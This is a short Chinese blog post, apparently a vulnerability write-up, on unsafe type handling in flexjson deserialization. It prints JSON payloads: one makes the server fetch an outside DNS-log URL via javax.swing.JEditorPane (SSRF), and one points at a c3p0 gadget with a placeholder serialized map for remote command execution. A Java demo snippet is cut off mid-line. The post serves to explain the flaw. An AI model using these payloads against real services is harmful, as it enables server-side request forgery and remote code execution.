flexjson反序列化漏洞

这里写目录标题

引言

flexjson 在反序列化时,flexjson自身没有任何控制,可以导致,客户端构造任意类型的序列化json数据,导致服务端反序列化时,触发恶意类的初始化,威胁服务端安全,如下例子 使用javax.swing.JEditorPane 类,通过其page属性的初始化,可以进行任意url嗅探,同样的可以利用
String json5 = “{“class”:“javax.swing.JEditorPane”,“page”:“http://ddd.wanghao723.ns.dnsl0g.cn/”}”;
如下json2字符串,利用com.mchange.v2.c3p0.WrapperConnectionPoolDataSource,攻击者可以直接进行远程命令
String json2 = "{“class”:“com.mchange.v2.c3p0.WrapperConnectionPoolDataSource”,“userOverridesAsString”:“HexAsciiSerializedMap:xxxx”}
javax.swing.JEditorPane 的ssrf利用效果

代码如下:

import flexjson.JSONDeserializer;

public static void main(String[] args) {
        final JSONDeserializer<Object> objectJSONDeserializer = new JSONDeserializer<>();
        String json2 = "{\"class\":\"com.mchange.v2.c3p0.WrapperConnectio
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值